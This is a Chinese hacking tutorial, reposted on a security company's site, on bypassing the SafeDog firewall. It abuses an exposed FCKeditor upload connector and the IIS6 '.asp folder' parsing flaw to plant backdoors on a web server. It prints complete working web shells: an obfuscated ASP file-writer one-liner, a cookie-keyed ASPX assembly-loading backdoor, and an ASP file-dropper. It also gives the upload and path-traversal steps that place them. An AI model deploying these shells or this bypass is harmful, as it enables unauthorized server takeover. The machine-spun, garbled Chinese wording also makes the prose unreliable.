|
|
|
联系客服020-83701501

从Fck漏洞的绕过谈突破安全狗经验

联系在线客服,可以获得免费在线咨询服务。 QQ咨询 我要预约
从Fck裂缝的绕过谈突破安全狗经验

Default
1 http://91ri.org/ fckeditor/editor/filemanager/connectors/test.html

FCKeditor的browser被删了,然则connector和测试页面都在,那就没问题了。
筹办一个图片马,命名为a.asp;.gif此后上传,FCK主动重命名为a_asp;.gif,碰到这种环境,对抗个文件再传一遍,文件就主动重命名为a.asp;(1).gif。
然则走访:

Default
1 http://91ri.org/ YourUploadFilePath/file/a.asp;(1).gif

却弹出提醒:

您的央求带有差异法的参数,感激竞争!
来自安全狗互联网安全履行室-web安全狗软件的友人提醒,体会更多请点击

不外看到友人已经把.asp文件夹建好了。直接传个图片到/shell.asp/这个文件夹,垄断iis6的解析裂缝,便可以解析成asp了,并且绕过了安全狗。
不外晓得许多多少马儿都上不去,菜刀一句话也403没辙。利落痛快就用别的了。建立shell.asp畸形文件夹的举措可以参考:《打点Fckeditor删除部分上传页面如何上传入侵》

Default
1 <%If request("cmd")<>"" And request("path")<>"" then Createobject("Scri"&"pting.FileSys"&"temObject").CreateTextFile(server.mappath(request("path"))).WriteLine request("cmd")%>

这是上传文件的一句话处事端,这个一句话可以用习科开辟的asp上传类一句话ShellClient联接并上传文件。点此下载:shellclient
除了这个工具,“ASPX一句话shell客户端”这个工具也可以完善的绕过安全狗。

这个aspx的处事端是:

Default
12 <%@ Page Language="C#" ValidateRequest="false" %><%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["psw"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>

密码是psw,然则现在上传后门是在/shell.asp/这个目次,假定命名aspx是500不解析的。假定加分号,对aspx也是没用的。
在“新后门”那边假定写xxx.asp,xxx.asa,xxx.cer都没问题,然则上传../xxx.aspx如许的把目次转出去到/shell.asp/文件夹内心的话就成功了
想想怎么把aspx的后门写到/shell.asp/目次内心。用了个小马:

Default
1234567891011121314151617181920212223242526272829303132 <%dim objFSOdim fdatadim objCountFileon error resume nextSet objFSO = Server.CreateObject("Scripting.FileSystemObject")if Trim(request("systempath"))<>"" thenfdata = request("sAvedata")Set objCountFile=objFSO.CreateTextFile(request("systempath"),True)objCountFile.Write fdataif err =0 thenresponse.write "<font color=red>生涯成功!</font>"elseresponse.write "<font color=red>生涯成功!</font>"end iferr.clearend ifobjCountFile.CloseSet objCountFile=NothingSet objFSO = NothingResponse.write "<form action='' method=post>"Response.write "生涯文件的<font color=red>绝对门路(包孕文件名:如D:\web\x.asp):</font>"Response.Write "<input type=text name=systempath width=32 size=50>"Response.Write "<br>"Response.write "本文件绝对门路"Response.write server.mappath(Request.ServerVariables("SCRIPT_NAME"))Response.write "<br>"Response.write "输入马的内容:"Response.write "<textarea name=sAvedata cols=80 rows=10 width=32></textarea>"Response.write "<input type=submit value=生涯>"Response.write "</form>"%>

如许就把aspx的马写到内心了
asp上传大马会提醒伤害参数禁止上传,然则用这个aspx就没问题了。只必要cmd拷贝一下便可以了。asp的大马紧张运行无压力。
这个站我真的没有被安全狗难倒,秒杀。有些东西只是纸老虎而已

91ri.org:许多人说安全狗是款很垃圾的产物,并不克不及说它不好 起首一款可以避收费给自己用的东西可以证实至少它的启航点是好的 共享精力是好的。?其次它的确拦截了许多脚本小子们的袭击举止。 然则安全狗公司在处理惩罚裂缝被发明这件事情上真的也的确让我们不满意,人开辟的就会有裂缝 被绕过也不是甚么难为情的事情,多跟google那些公司进修 一款产物的进步不是去封杀它存在的问题 而是改进改进在改进!

原文:http://bbs.blackbap.org/thread-3324-1-1.html

本文由Internet安全攻防研究室(www.91ri.org)动态安全小组收集整顿,转载请说明出处!

数安新闻+更多

证书相关+更多